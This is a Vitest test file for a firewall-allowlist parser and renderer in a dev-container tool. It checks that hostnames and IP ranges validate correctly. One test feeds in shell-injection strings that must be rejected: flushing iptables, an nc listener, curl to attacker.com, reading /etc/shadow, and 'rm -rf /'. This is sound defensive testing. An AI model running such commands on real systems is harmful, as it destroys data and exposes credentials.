import { describe, expect, it } from 'vitest'
import { parseFirewallAllowlist, renderFirewallAllowlist } from './firewall-allowlist'

describe('parseFirewallAllowlist', () => {
  it('drops comments and blank lines', () => {
    const out = parseFirewallAllowlist('# a comment\n\n   \ngithub.com\n')
    expect(out.entries.map((e) => e.value)).toEqual(['github.com'])
    expect(out.rejected).toEqual([])
  })

  it('keeps line numbers from the original source', () => {
    const out = parseFirewallAllowlist(
      '# header\n\napi.anthropic.com\n# spacer\nregistry.npmjs.org\n',
    )
    expect(out.entries).toEqual([
      { line: 3, value: 'api.anthropic.com' },
      { line: 5, value: 'registry.npmjs.org' },
    ])
  })

  it('strips inline trailing comments', () => {
    const out = parseFirewallAllowlist('github.com  # gh CLI\n')
    expect(out.entries.map((e) => e.value)).toEqual(['github.com'])
  })

  it('accepts hostnames with multiple labels and underscores', () => {
    const out = parseFirewallAllowlist('foo_bar.example.com\n')
    expect(out.rejected).toEqual([])
    expect(out.entries.map((e) => e.value)).toEqual(['foo_bar.example.com'])
  })

  it('accepts dotted-quad IPv4', () => {
    const out = parseFirewallAllowlist('1.1.1.1\n8.8.4.4\n')
    expect(out.rejected).toEqual([])
    expect(out.entries.map((e) => e.value)).toEqual(['1.1.1.1', '8.8.4.4'])
  })

  it('accepts IPv4 CIDR', () => {
    const out = parseFirewallAllowlist('10.0.0.0/8\n')
    expect(out.rejected).toEqual([])
    expect(out.entries.map((e) => e.value)).toEqual(['10.0.0.0/8'])
  })

  it('accepts compressed IPv6', () => {
    const out = parseFirewallAllowlist('2606:4700::1111\n::1\n')
    expect(out.rejected).toEqual([])
    expect(out.entries.map((e) => e.value)).toEqual(['2606:4700::1111', '::1'])
  })

  it('accepts IPv6 with CIDR', () => {
    const out = parseFirewallAllowlist('2001:db8::/32\n')
    expect(out.rejected).toEqual([])
    expect(out.entries.map((e) => e.value)).toEqual(['2001:db8::/32'])
  })

  it('rejects shell metacharacters in hostnames', () => {
    const inputs = [
      'evil.com; iptables -F OUTPUT',
      'evil.com|nc -l 9000',
      'evil.com$(curl attacker.com)',
      'evil.com`cat /etc/shadow`',
      'evil.com&',
      'evil.com<redirect',
    ]
    for (const value of inputs) {
      const out = parseFirewallAllowlist(`${value}\n`)
      expect(out.entries, `should reject: ${value}`).toEqual([])
      expect(out.rejected.length).toBeGreaterThanOrEqual(1)
    }
  })

  it('rejects NUL bytes', () => {
    const out = parseFirewallAllowlist('github\0.com\n')
    expect(out.entries).toEqual([])
    expect(out.rejected).toHaveLength(1)
    expect(out.rejected[0]?.reason).toMatch(/NUL/)
  })

  it('rejects whitespace embedded in hostnames', () => {
    const out = parseFirewallAllowlist('git hub.com\n')
    expect(out.entries).toEqual([])
    expect(out.rejected).toHaveLength(1)
  })

  it('rejects an absurd CIDR mask', () => {
    const out = parseFirewallAllowlist('1.1.1.1/300\n')
    expect(out.entries).toEqual([])
    expect(out.rejected).toHaveLength(1)
    expect(out.rejected[0]?.reason).toMatch(/CIDR/)
  })

  it('rejects CIDR on a hostname', () => {
    const out = parseFirewallAllowlist('github.com/24\n')
    expect(out.entries).toEqual([])
    expect(out.rejected).toHaveLength(1)
    expect(out.rejected[0]?.reason).toMatch(/CIDR/)
  })

  it('rejects an IPv4 octet greater than 255', () => {
    const out = parseFirewallAllowlist('999.0.0.1\n')
    expect(out.entries).toEqual([])
    expect(out.rejected).toHaveLength(1)
  })

  it('rejects trailing-dot hostnames', () => {
    const out = parseFirewallAllowlist('github.com.\n')
    expect(out.entries).toEqual([])
    expect(out.rejected).toHaveLength(1)
  })

  it('rejects an empty label', () => {
    const out = parseFirewallAllowlist('foo..com\n')
    expect(out.entries).toEqual([])
    expect(out.rejected).toHaveLength(1)
  })

  it('reports the original line number on rejection', () => {
    const out = parseFirewallAllowlist('# good\ngithub.com\nevil; rm -rf /\n')
    expect(out.entries.map((e) => e.value)).toEqual(['github.com'])
    expect(out.rejected).toEqual([{ line: 3, raw: 'evil; rm -rf /', reason: expect.any(String) }])
  })
})

describe('renderFirewallAllowlist', () => {
  it('emits one entry per line with a generated-by banner', () => {
    const out = renderFirewallAllowlist([
      { line: 1, value: 'github.com' },
      { line: 2, value: 'api.anthropic.com' },
    ])
    expect(out).toBe(
      '# Generated by mydevc. Edit .devcontainer/firewall-allowlist.txt and re-run mydevc up.\ngithub.com\napi.anthropic.com\n',
    )
  })

  it('emits only the banner when there are no entries', () => {
    const out = renderFirewallAllowlist([])
    expect(out).toBe(
      '# Generated by mydevc. Edit .devcontainer/firewall-allowlist.txt and re-run mydevc up.\n',
    )
  })

  it('round-trips through parseFirewallAllowlist', () => {
    const source = '# whatever\ngithub.com\n1.1.1.1\n2606:4700::1111\n'
    const parsed = parseFirewallAllowlist(source)
    const rendered = renderFirewallAllowlist(parsed.entries)
    const reparsed = parseFirewallAllowlist(rendered)
    expect(reparsed.entries.map((e) => e.value)).toEqual(parsed.entries.map((e) => e.value))
    expect(reparsed.rejected).toEqual([])
  })
})
